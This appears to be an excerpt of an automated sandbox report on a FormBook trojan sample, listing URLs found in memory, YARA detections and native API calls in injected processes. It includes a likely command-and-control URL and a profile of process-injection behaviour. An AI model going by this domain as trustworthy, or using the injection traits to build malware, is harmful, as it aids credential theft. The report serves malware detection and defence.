Source: unlodctr.exe, 00000008.00000002.3515982994.0000000003A24000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000002F54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3138320391.000000002A324000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514140722.0000000000C63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514140722.0000000000C63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz/qruc/
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unlodctr.exe, 00000008.00000002.3517962083.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515982994.0000000003D48000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000003278000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://domaincntrol.com/?orighost=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2:
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unlodctr.exe, 00000008.00000003.3031185324.00000000075F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: unlodctr.exe, 00000008.00000002.3517962083.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515982994.0000000003D48000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000003278000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nojs.domaincntrol.com
Source: file.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0042AE33 NtClose, 4_2_0042AE33
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12B60 NtClose,LdrInitializeThunk, 4_2_01A12B60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_01A12DF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_01A12C70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A135C0 NtCreateMutant,LdrInitializeThunk, 4_2_01A135C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A14340 NtSetContextThread, 4_2_01A14340
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A14650 NtSuspendThread, 4_2_01A14650
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BA0 NtEnumerateValueKey, 4_2_01A12BA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12B80 NtQueryInformationFile, 4_2_01A12B80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BE0 NtQueryValueKey, 4_2_01A12BE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BF0 NtAllocateVirtualMemory, 4_2_01A12BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AB0 NtWaitForSingleObject, 4_2_01A12AB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AF0 NtWriteFile, 4_2_01A12AF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AD0 NtReadFile, 4_2_01A12AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DB0 NtEnumerateKey, 4_2_01A12DB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DD0 NtDelayExecution, 4_2_01A12DD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D30 NtUnmapViewOfSection, 4_2_01A12D30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D00 NtSetInformationFile, 4_2_01A12D00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D10 NtMapViewOfSection, 4_2_01A12D10
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CA0 NtQueryInformationToken, 4_2_01A12CA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CF0 NtOpenProcess, 4_2_01A12CF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CC0 NtQueryVirtualMemory, 4_2_01A12CC0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C00 NtQueryInformationProcess, 4_2_01A12C00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C60 NtCreateKey, 4_2_01A12C60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FA0 NtQuerySection, 4_2_01A12FA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FB0 NtResumeThread, 4_2_01A12FB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F90 NtProtectVirtualMemory, 4_2_01A12F90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FE0 NtCreateFile, 4_2_01A12FE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F30 NtCreateSection, 4_2_01A12F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F60 NtCreateProcessEx, 4_2_01A12F60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12EA0 NtAdjustPrivilegesToken, 4_2_01A12EA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12E80 NtReadVirtualMemory, 4_2_01A12E80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12EE0 NtQueueApcThread, 4_2_01A12EE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12E30 NtWriteVirtualMemory, 4_2_01A12E30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13090 NtSetValueKey, 4_2_01A13090
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13010 NtOpenDirectoryObject, 4_2_01A13010
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A139B0 NtGetContextThread, 4_2_01A139B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13D10 NtOpenProcessToken, 4_2_01A13D10
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13D70 NtOpenThread, 4_2_01A13D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03084340 NtSetContextThread,LdrInitializeThunk, 8_2_03084340
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03084650 NtSuspendThread,LdrInitializeThunk, 8_2_03084650
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082B60 NtClose,LdrInitializeThunk, 8_2_03082B60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_03082BA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_03082BE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03082BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AD0 NtReadFile,LdrInitializeThunk, 8_2_03082AD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AF0 NtWriteFile,LdrInitializeThunk, 8_2_03082AF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F30 NtCreateSection,LdrInitializeThunk, 8_2_03082F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FB0 NtResumeThread,LdrInitializeThunk, 8_2_03082FB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FE0 NtCreateFile,LdrInitializeThunk, 8_2_03082FE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_03082E80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03082EE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03082D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_03082D30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03082DD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03082DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C60 NtCreateKey,LdrInitializeThunk, 8_2_03082C60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03082C70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03082CA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030835C0 NtCreateMutant,LdrInitializeThunk, 8_2_030835C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030839B0 NtGetContextThread,LdrInitializeThunk, 8_2_030839B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082B80 NtQueryInformationFile, 8_2_03082B80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AB0 NtWaitForSingleObject, 8_2_03082AB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F60 NtCreateProcessEx, 8_2_03082F60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F90 NtProtectVirtualMemory, 8_2_03082F90
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FA0 NtQuerySection, 8_2_03082FA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082E30 NtWriteVirtualMemory, 8_2_03082E30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082EA0 NtAdjustPrivilegesToken, 8_2_03082EA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D00 NtSetInformationFile, 8_2_03082D00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DB0 NtEnumerateKey, 8_2_03082DB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C00 NtQueryInformationProcess, 8_2_03082C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CC0 NtQueryVirtualMemory, 8_2_03082CC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CF0 NtOpenProcess, 8_2_03082CF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083010 NtOpenDirectoryObject, 8_2_03083010
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083090 NtSetValueKey, 8_2_03083090
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083D10 NtOpenProcessToken, 8_2_03083D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03083D70 NtOpenThread, 8_2_03083D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377660 NtCreateFile, 8_2_00377660
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003777C0 NtReadFile, 8_2_003777C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003778A0 NtDeleteFile, 8_2_003778A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377930 NtClose, 8_2_00377930
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00377A80 NtAllocateVirtualMemory, 8_2_00377A80
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010BD74C 0_2_010BD74C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0511C258 0_2_0511C258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0511D285 0_2_0511D285
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0704E5A0 0_2_0704E5A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07040AC8 0_2_07040AC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070423A3 0_2_070423A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070423B0 0_2_070423B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0704CBE8 0_2_0704CBE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07042018 0_2_07042018
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07042028 0_2_07042028
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6740 0_2_070D6740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6750 0_2_070D6750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D4C40 0_2_070D4C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D54A1 0_2_070D54A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D54B0 0_2_070D54B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D64F0 0_2_070D64F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D6B88 0_2_070D6B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070DB930 0_2_070DB930
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_070D5078 0_2_070D5078
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07048D70 0_2_07048D70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040F94A 4_2_0040F94A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040F953 4_2_0040F953
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0042D273 4_2_0042D273
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_004162F3 4_2_004162F3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00403280 4_2_00403280
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040FB73 4_2_0040FB73
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040DBF3 4_2_0040DBF3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00401D66 4_2_00401D66
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00401D70 4_2_00401D70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00402640 4_2_00402640
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00402635 4_2_00402635
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA01AA 4_2_01AA01AA
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A941A2 4_2_01A941A2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A981CC 4_2_01A981CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0100 4_2_019D0100
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A68158 4_2_01A68158
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA03E6 4_2_01AA03E6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A352 4_2_01A9A352
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A602C0 4_2_01A602C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA0591 4_2_01AA0591
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8E4F6 4_2_01A8E4F6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84420 4_2_01A84420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A92446 4_2_01A92446
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DC7C0 4_2_019DC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04750 4_2_01A04750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FC6E0 4_2_019FC6E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AAA9A6 4_2_01AAA9A6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C68B8 4_2_019C68B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E8F0 4_2_01A0E8F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E2840 4_2_019E2840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EA840 4_2_019EA840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A96BD7 4_2_01A96BD7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9AB40 4_2_01A9AB40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F8DBF 4_2_019F8DBF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DADE0 4_2_019DADE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EAD00 4_2_019EAD00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7CD1F 4_2_01A7CD1F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80CB5 4_2_01A80CB5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0CF2 4_2_019D0CF2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0C00 4_2_019E0C00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5EFA0 4_2_01A5EFA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2FC8 4_2_019D2FC8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019ECFE0 4_2_019ECFE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A22F28 4_2_01A22F28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00F30 4_2_01A00F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A82F30 4_2_01A82F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54F40 4_2_01A54F40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2E90 4_2_019F2E90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9CE93 4_2_01A9CE93
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9EEDB 4_2_01A9EEDB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9EE26 4_2_01A9EE26
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0E59 4_2_019E0E59
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EB1B0 4_2_019EB1B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AAB16B 4_2_01AAB16B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1516C 4_2_01A1516C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CF172 4_2_019CF172
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A970E9 4_2_01A970E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F0E0 4_2_01A9F0E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E70C0 4_2_019E70C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8F0CC 4_2_01A8F0CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A2739A 4_2_01A2739A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9132D 4_2_01A9132D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CD34C 4_2_019CD34C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E52A0 4_2_019E52A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A812ED 4_2_01A812ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FB2C0 4_2_019FB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7D5B0 4_2_01A7D5B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97571 4_2_01A97571
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F43F 4_2_01A9F43F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D1460 4_2_019D1460
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9F7B0 4_2_01A9F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A916CC 4_2_01A916CC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A75910 4_2_01A75910
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E9950 4_2_019E9950
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FB950 4_2_019FB950
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E38E0 4_2_019E38E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4D800 4_2_01A4D800
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FFB80 4_2_019FFB80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A55BF0 4_2_01A55BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1DBF9 4_2_01A1DBF9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FB76 4_2_01A9FB76
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A25AA0 4_2_01A25AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7DAAC 4_2_01A7DAAC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A81AA3 4_2_01A81AA3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8DAC6 4_2_01A8DAC6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A53A6C 4_2_01A53A6C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FA49 4_2_01A9FA49
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97A46 4_2_01A97A46
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FFDC0 4_2_019FFDC0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A97D73 4_2_01A97D73
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E3D40 4_2_019E3D40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A91D5A 4_2_01A91D5A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FCF2 4_2_01A9FCF2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A59C32 4_2_01A59C32
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E1F92 4_2_019E1F92
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FFB1 4_2_01A9FFB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9FF09 4_2_01A9FF09
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E9EB0 4_2_019E9EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310A352 8_2_0310A352
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305E3F0 8_2_0305E3F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031103E6 8_2_031103E6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F0274 8_2_030F0274
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030D02C0 8_2_030D02C0
